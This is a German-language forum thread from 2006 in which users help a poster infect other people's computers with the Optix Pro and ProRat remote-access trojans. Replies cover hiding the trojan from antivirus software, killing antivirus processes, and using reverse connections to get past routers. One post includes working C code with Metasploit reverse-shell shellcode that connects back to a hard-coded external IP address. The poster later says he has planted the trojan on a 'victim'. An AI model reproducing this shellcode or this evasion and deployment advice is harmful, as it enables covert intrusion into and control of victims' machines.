Optix pro Fragen

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von zuzaaNo.1, 15. Mai 2006 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 15. Mai 2006
    Hallo,
    ich wollte mal ganz nett fragen was ich dagegen tun kann , wenn ich den gebuildeten Trojaner an jemanden verschicke , da kommt die warnung bei der jenigen person vom virus programm...
    man kann ja beim builder die prozesse abschalten lassen indem man sie dort einfach reinschreibt bei irgendeiner option....
    Kann mir vielleicht einer tipps dafür geben?

    Noch eine Frage nebenbei:
    Wenn sich jemand gut mit viren progs auskennt , könnt ihr mit bitte die jeweiligen namen die von den viren in der Prozess leiste bei windows stehen?
    zB antivir.exe etc . aber halt nur von mehreren ....man weiss ja nie welches prog jemand hat...

    danke..wenn ich was falsches gefragt habe dann möchte ich mich hiermit entschuldigen .

    Werde jeden mit einer hilfreichen antwort 10er schmeissen.
    Danke!
     

  2. Anzeige
  3. #2 15. Mai 2006
    du musst dein trojaner stealthen
    das heißt für die antivirus progs unsichtbar machen
    dann kommt bei dem auch keine warnung
    das is aber ziemlich schwer find ich
    es gibt verschiedene methoden aber nicht jede methode hilft bei jedem av
    naja aber dazu gibts ja genügend beiträge glaub ich
    wenn ned dann Google

    hoffe ich konnte dir bissl weiterhelfen

    mfg ilovevalla
     
  4. #3 15. Mai 2006
  5. #4 15. Mai 2006
    Ja vielen dank für die antworten...
    Kann ich irgendwie den router , da es nich immer klappt mit optix zu verbinden , umgehen?
    Oder brauch ich da schon so andere progs ...?
    Ich habe schon was von steahlten und so gehört jedoch sehr wenig ahnung...

    10er wurde vergeben!
    Danke , jedoch wenn möglich ich bräuchte noch hilfe ihr seht ja ich habe probs..
    ich vergebe gerne noch 10er....
     
  6. #5 15. Mai 2006
    es ggibt die sog reverse connection dabei connectet dich der server wenn der opfer pc online geht

    mfg ilovevalla
     
  7. #6 16. Mai 2006
    ja davon habe ich gehört..
    genau das is es , denn es is immer der Router denk ich mal der stört...deswegen brauch ich etwas was an ihn vobei kommt...
    was is das woher kann ich es bekommen diese sogennanten ´´reversen connections´´

    Danke! Mfg
     
  8. #7 16. Mai 2006
    die reverse connection is bei den neuen trojanern dabei
    integriert im tool
    ich würd halt mal bei google suchen

    mfg ilovevalla
     
  9. #8 16. Mai 2006
    wird wohl jetzt von allen gängigen avs erkannt...sollte nix mehr bringen...


    vlt sollte man einfach mal ne reverse shell ausprobieren ... erkennt garantiert keine av :p


    Code:
    #include <stdio.h> 
     
     /* win32_reverse - EXITFUNC=seh LHOST=216.75.15.231 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com */ 
     unsigned char scode[] = 
     "\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7b" 
     "\x0b\x45\xb9\x83\xeb\xfc\xe2\xf4\x87\x61\xae\xf4\x93\xf2\xba\x46" 
     "\x84\x6b\xce\xd5\x5f\x2f\xce\xfc\x47\x80\x39\xbc\x03\x0a\xaa\x32" 
     "\x34\x13\xce\xe6\x5b\x0a\xae\xf0\xf0\x3f\xce\xb8\x95\x3a\x85\x20" 
     "\xd7\x8f\x85\xcd\x7c\xca\x8f\xb4\x7a\xc9\xae\x4d\x40\x5f\x61\x91" 
     "\x0e\xee\xce\xe6\x5f\x0a\xae\xdf\xf0\x07\x0e\x32\x24\x17\x44\x52" 
     "\x78\x27\xce\x30\x17\x2f\x59\xd8\xb8\x3a\x9e\xdd\xf0\x48\x75\x32" 
     "\x3b\x07\xce\xc9\x67\xa6\xce\xf9\x73\x55\x2d\x37\x35\x05\xa9\xe9" 
     "\x84\xdd\x23\xea\x1d\x63\x76\x8b\x13\x7c\x36\x8b\x24\x5f\xba\x69" 
     "\x13\xc0\xa8\x45\x40\x5b\xba\x6f\x24\x82\xa0\xdf\xfa\xe6\x4d\xbb" 
     "\x2e\x61\x47\x46\xab\x63\x9c\xb0\x8e\xa6\x12\x46\xad\x58\x16\xea" 
     "\x28\x48\x16\xfa\x28\xf4\x95\xd1\xa3\x40\x4a\x5e\x1d\x63\x55\x58" 
     "\x1d\x58\xcc\x58\xee\x63\xa9\x40\xd1\x6b\x12\x46\xad\x61\x55\xe8" 
     "\x2e\xf4\x95\xdf\x11\x6f\x23\xd1\x18\x66\x2f\xe9\x22\x22\x89\x30" 
     "\x9c\x61\x01\x30\x99\x3a\x85\x4a\xd1\x9e\xcc\x44\x85\x49\x68\x47" 
     "\x39\x27\xc8\xc3\x43\xa0\xee\x12\x13\x79\xbb\x0a\x6d\xf4\x30\x91" 
     "\x84\xdd\x1e\xee\x29\x5a\x14\xe8\x11\x0a\x14\xe8\x2e\x5a\xba\x69" 
     "\x13\xa6\x9c\xbc\xb5\x58\xba\x6f\x11\xf4\xba\x8e\x84\xdb\x2d\x5e" 
     "\x02\xcd\x3c\x46\x0e\x0f\xba\x6f\x84\x7c\xb9\x46\xab\x63\xb5\x33" 
     "\x7f\x54\x16\x46\xad\xf4\x95\xb9"; 
     
     int main() { 
     void (*call)() = (void*)scode; 
     call(); 
     return 0; 
     }
    die passenden payloads gibts hier http://metasploit.com:55555

    hinweis : bitte keine nervenden pms dazu !


    mfg moep
     
  10. #9 16. Mai 2006
    Also ich habe jetzt schon wieder das problem beim kollegen gehabt wir haben es versucht , jedoch hat der virus prog es erkannt...
    ich weiss nich wie es funktionieren soll , das er es nicht erkennt ... er war gesteahlt und gepackt gebindet...ok dankeschön!
     
  11. #10 20. Mai 2006
    Hallo ,
    habe jetzt das mit der reversen conection gemacht , ein opfer auch den trojan untergebracht...
    jedoch ich kann es nich mit pro rat verbinden...die ip von dem opfer steht da bei mir nur ich komm nicht drauf auf den pc...es müsste doch eigentlich gehen durch router oder nicht?
    Und da steht auch wenn ich da zugreifen will auf den pc und funktionen ausführen will , das ich den falschen Port benutze...
    Sorry das ich so nervig bin , jedoch wäre es nett wenn ihr mir noch bei der frage hier hilfreich währet.
    Danke im vorraus!

    MFG
     

  12. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Optix pro Fragen
  1. Antworten:
    0
    Aufrufe:
    599
  2. Antworten:
    2
    Aufrufe:
    360
  3. Optix Pro Problem

    R0xD , 23. Februar 2007 , im Forum: Sicherheit & Datenschutz
    Antworten:
    2
    Aufrufe:
    426
  4. Antworten:
    12
    Aufrufe:
    729
  5. Antworten:
    2
    Aufrufe:
    509